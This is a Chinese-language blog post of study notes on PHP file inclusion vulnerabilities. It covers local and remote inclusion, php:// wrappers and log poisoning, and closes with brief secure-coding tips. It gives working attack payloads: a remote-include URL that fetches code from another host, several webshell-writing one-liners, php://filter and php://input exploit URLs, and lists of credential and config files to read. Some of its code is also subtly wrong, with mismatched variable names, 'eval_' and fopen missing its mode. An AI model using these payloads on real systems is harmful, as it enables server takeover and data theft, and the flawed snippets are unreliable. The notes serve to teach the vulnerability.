文件包含漏洞学习笔记

0x00 前言

​ 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件而无需再次编写,这种调用文件的过程被称为包含。被包含的文件设置为变量,用来动态调用时,导致客户端可以调用一个恶意文件,造成文件包含漏洞。

0x01 文件包含函数

  • require:找不到被包含文件时会产生错误(E_COMPILE_ERROR),并停止脚本
  • include:找不到被包含文件时只会产生警告(E_WARNING),脚本将继续执行
  • include_once:同include,若该文件中的代码已经被包含,则不会再次包含
  • require_once:同require,若该文件中的代码已经被包含,则不会再次包含

0x02 漏洞形成条件

  • allow_url_fopen=On(本地包含)
  • allow_url_include=On(远程包含)
  • 用户可以动态控制变量

0x03 本地包含(Local File Include)

  • index.php文件中包含phpinfo.txt

    phpinfo.txt:
    <?php
    	phpinfo();
    ?>
    
    index.php:
    <?php
    	include("phpinfo.txt");
    ?>
    
  • 任意文件包含

    <?php
        $filename  = $_GET['filename'];
        include($filename);
    ?>
    

    $filename可控且参数没有做任何过滤时,输入恶意文件,导致执行非预期的代码

  • 文件内容符合php语法规范,任何扩展名都可以被php解析

  • 包含非php语法规范文件时,将会暴露其源代码

0x04 远程包含(Remote File Include)

  • 任意远程文件包含
index.php:
<?php
	$filename = $_GET['page'];
	include($page);
?>

phpinfo.txt:
<?php
	phpinfo();
?>
http://www.xxer.com/index.php?page=http://192.168.31.87/fi/phpinfo.txt

0x05 文件包含利用

读取敏感文件

  • Windows系统
C:\boot.ini							     //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml   //IIS配置文件
C:\windows\repair\sam					 //存储Windows系统初次安装的密码
C:\Program Files\mysql\my.ini			  //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\windows\php.ini						 //php配置信息
C:\windows\my.ini						 //Mysql配置文件
  • UNIX/Linux系统
/etc/passwd
/usr/local/app/apache2/conf/httpd.conf			  //apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//虛拟网站设置
/usr/local/app/php5/lib/php.ini					 //PHP相关设置
/etc/httpd/conf/httpd.conf						//apache配置文件
/etc/my.cnf	  							       //Mysql的配置文件

远程包含shell

echo.txt:
<?fputs(fopen("shell.php","w"),"<?php eval_($POST['0xdawn'];)?>")?>

访问 http://www.xxer.com/index.php?page=http://192.168.31.87/echo.txt
将会在index.php所在目录下生成shell.php

本地包含+文件上传

shell.jpg:
<?fputs(fopen("shell.php","w"),"<?php eval_($POST['0xdawn'];)?>")?>

上传一句话木马图片到服务器,路径为/uploadfile/shell.jpg

访问 http://www.xxer.com/index.php?page=./uploadfile/shell.jpg
将会在index.php所在目录下生成shell.php

php封装协议

名称含义
file://访问本地文件
http://访问http网址
ftp://访问FTP URL
php://访问输入/输出流
zlib://压缩流
data://数据
ssh2://secure shell 2
expect://处理交互式流
glob://查找匹配的文件路径
  • 读取php文件
http://www.xxer.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php

得到base64加密后的php源代码

  • 写入php文件
http://www.xxer.com/index.php?page=php://input
POST:<?fputs(fopen("shell.php"),"<?php eval($POST['0xdawn']);?>")?>

在index.php目录下生成shell.php

  • 包含apache日志文件

Apache运行后默认生成两个日志文件,access.log(访问日志)和error.log(错误日志)

访问url:http://www.xxer.com/<?php phpinfo();?>,Apache记录请求并写入access.log文件

  • 绕WAF

上传一句话木马图片再在php文件中包含这个木马图片,可以绕过部分杀软

0x06 安全编写包含

  • 严格判断包含中的参数是否外部可控
  • 限制被包含的文件只能在某一文件夹中,进制目录跳转字符
  • 验证被包含的文件是否在白名单中
  • 尽量不使用动态包含
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 书香水墨 设计师:CSDN官方博客 返回首页